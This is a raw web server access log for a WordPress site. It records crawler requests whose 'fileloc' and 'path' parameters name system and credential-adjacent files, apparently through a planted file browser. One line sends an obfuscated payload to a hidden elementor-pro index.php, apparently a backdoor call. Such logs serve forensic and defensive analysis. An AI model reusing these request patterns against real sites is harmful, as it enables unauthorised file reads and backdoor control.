216.73.216.183 - - [22/Oct/2025:00:35:47 +0000] "GET /389906886?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.209.174.110 - - [22/Oct/2025:00:35:48 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/kernel/slab/kmalloc-rnd-11-1k/skip_kfence&path=//sys/kernel/slab/kmalloc-rnd-11-1k HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:48 +0000] "GET /389906886/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/389906886?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.162.92.127 - - [22/Oct/2025:00:35:48 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//usr/src/linux-headers-6.8.0-64-generic/include/linux/rfkill.h&path=//usr/src/linux-headers-6.8.0-64-generic/include/linux HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
20.171.207.217 - - [22/Oct/2025:00:35:49 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/device/driver/virtio1/block/vda/device/block/vda/subsystem/vda1/holders HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:49 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/loop0/subsystem/sr0/queue/bsg/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.135.21.75 - - [22/Oct/2025:00:35:51 +0000] "POST /wp-cron.php?doing_wp_cron=1761093350.5652220249176025390625 HTTP/1.1" 499 0 "-" "WordPress/6.3.1; https://datainsightnow.com"
216.73.216.183 - - [22/Oct/2025:00:35:51 +0000] "GET /19874371?path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:35:52 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/vda/subsystem/vda/subsystem/loop5/subsystem/loop0/power HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
40.77.167.27 - - [22/Oct/2025:00:35:52 +0000] "GET /enc_avif?fileloc=//sys/kernel/slab/fsverity_info/objects_partial&path=//sys/kernel/slab/fsverity_info HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:53 +0000] "GET /19874371/?path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/19874371?path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:35:53 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/vda2/subsystem/vda/subsystem/loop6/mq HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.232.82.72 - - [22/Oct/2025:00:35:53 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/kernel/slab/fanotify_perm_event/objects_partial&path=//sys/kernel/slab/fanotify_perm_event HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:54 +0000] "GET /647151380?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:35:54 +0000] "GET /647151380/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/647151380?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:35:55 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/loop2/subsystem/loop6/bdi/subsystem HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:55 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/vda2/subsystem/vda/subsystem/loop2/bdi/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.166.76.86 - - [22/Oct/2025:00:35:55 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/398/task/398/clear_refs&path=//proc/398/task/398 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
54.243.63.52 - - [22/Oct/2025:00:35:56 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//lib/x86_64-linux-gnu/dri/crocus_dri.so&path=//lib/x86_64-linux-gnu/dri HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:56 +0000] "GET /210931670?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:35:57 +0000] "GET /210931670/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/210931670?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.0.57 - - [22/Oct/2025:00:35:57 +0000] "GET /karamba-spielsaal-erfahrungen-angeschlossen-testbericht-werfen-sie-einen-blick-auf-den-link-within-2025-pro-teutonia/?fileloc=//sys/class/pci_bus/0000:06/subsystem/0000:0b/subsystem/0000:0b/device/subsystem/devices/0000:00:02.3/device&path=//sys/class/pci_bus/0000:06/subsystem/0000:0b/subsystem/0000:0b/device/subsystem/devices/0000:00:02.3 HTTP/1.1" 200 262248 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
20.171.207.217 - - [22/Oct/2025:00:35:58 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/vda/subsystem/vda/subsystem/loop2/subsystem/vda/device/block/vda/vda1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:58 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/vda/vda2/subsystem/loop3/mq HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
85.208.96.208 - - [22/Oct/2025:00:35:59 +0000] "GET /?p=30901 HTTP/1.1" 200 40993 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.183 - - [22/Oct/2025:00:35:59 +0000] "GET /620682616?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:36:00 +0000] "GET /620682616/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/620682616?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.213.36.21 - - [22/Oct/2025:00:36:00 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//sys/kernel/slab/UNIX/destroy_by_rcu&path=//sys/kernel/slab/UNIX HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.217 - - [22/Oct/2025:00:36:01 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/vda2/subsystem/vda/subsystem/vda/subsystem/vda/device/block/vda HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:36:01 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/vda1/subsystem/vda/subsystem/loop6 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.135.21.75 - - [22/Oct/2025:00:36:02 +0000] "GET /wp-content/plugins/elementor-pro/core/database/database/index.php?ARRAY=7o2230223n313736313039363930322p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313736313039333330322q3864303336373063623763653830643330316631303363376239626137393234222p2232223n226130333239623032353066623366656364343932343164363530613864656465222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33382q35392q36372q37332q38322q3330227q HTTP/1.1" 504 176 "-" "-"
216.73.216.183 - - [22/Oct/2025:00:36:02 +0000] "GET /248028497?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:36:03 +0000] "GET /248028497/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/248028497?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:36:04 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/vda1/subsystem/vda/subsystem/loop1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.214.198.69 - - [22/Oct/2025:00:36:04 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/135/net/snmp6&path=//proc/135/net HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
20.171.207.78 - - [22/Oct/2025:00:36:04 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/vda1/subsystem/loop4/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
184.73.195.18 - - [22/Oct/2025:00:36:05 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//usr/lib/firmware/cirrus/cs35l41-dsp1-spk-cali-10433a40-spkid1-r0.bin.zst&path=//usr/lib/firmware/cirrus HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:36:05 +0000] "GET /136002719?path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:36:06 +0000] "GET /136002719/?path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/136002719?path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:36:07 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/vda/subsystem/loop6/subsystem/loop3 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:36:07 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/device/block/vda/subsystem/sr0/mq/0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:36:08 +0000] "GET /597829241?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:36:09 +0000] "GET /597829241/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/597829241?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.202.233.37 - - [22/Oct/2025:00:36:09 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//etc/apt/apt.conf.d/15update-stamp&path=//etc/apt/apt.conf.d HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.217 - - [22/Oct/2025:00:36:10 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/loop7/subsystem/vda/subsystem/vda/subsystem/vda/vda1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:36:11 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/device/block/vda/vda1/subsystem/loop1 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:36:11 +0000] "GET /647139209?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:36:12 +0000] "GET /647139209/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/647139209?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.210.199.111 - - [22/Oct/2025:00:36:12 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/thread-self/cwd/wp-includes/media-template.php&path=//proc/thread-self/cwd/wp-includes HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
23.21.179.120 - - [22/Oct/2025:00:36:13 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//opt/wpsites/gsudice.dataconn.net/wp-includes/class-wp-ajax-response.php&path=//opt/wpsites/gsudice.dataconn.net/wp-includes HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.217 - - [22/Oct/2025:00:36:13 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/vda2/subsystem/vda/subsystem/vda/subsystem/vda/device/block/vda/subsystem/loop7 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:36:14 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/vda1/subsystem/vda/subsystem/loop2 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:36:14 +0000] "GET /334426241?path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:36:15 +0000] "GET /334426241/?path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/334426241?path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
50.19.102.70 - - [22/Oct/2025:00:36:16 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=/opt/wpsites/datacloudnow.com/wp-includes/images/smilies/icon_arrow.gif&path=/opt/wpsites/datacloudnow.com/wp-includes/images/smilies HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.217 - - [22/Oct/2025:00:36:17 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/vda1/subsystem/vda/subsystem/vda/subsystem/vda/device/block/vda/subsystem/loop0 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:36:17 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/vda/subsystem/sr0/mq/0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:36:17 +0000] "GET /55477286?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:36:18 +0000] "GET /55477286/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/55477286?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
207.46.13.168 - - [22/Oct/2025:00:36:18 +0000] "GET /146062532?entity=0145498842 HTTP/1.1" 200 22560 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
54.160.19.125 - - [22/Oct/2025:00:36:19 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//var/lib/dpkg/info/apport.conffiles&path=//var/lib/dpkg/info HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
20.171.207.217 - - [22/Oct/2025:00:36:20 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/loop3/subsystem/vda/subsystem/vda/subsystem/vda/vda1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:36:20 +0000] "GET /496429956?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
